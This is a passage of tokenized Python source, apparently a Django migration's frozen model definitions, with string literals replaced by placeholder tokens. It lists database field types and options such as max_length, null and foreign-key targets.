'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:3>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' 
: ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : 
'<STR_LIT:None>' , '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' 
, [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:version>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' 
: '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , 
<EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' 
: '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' 
: ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , 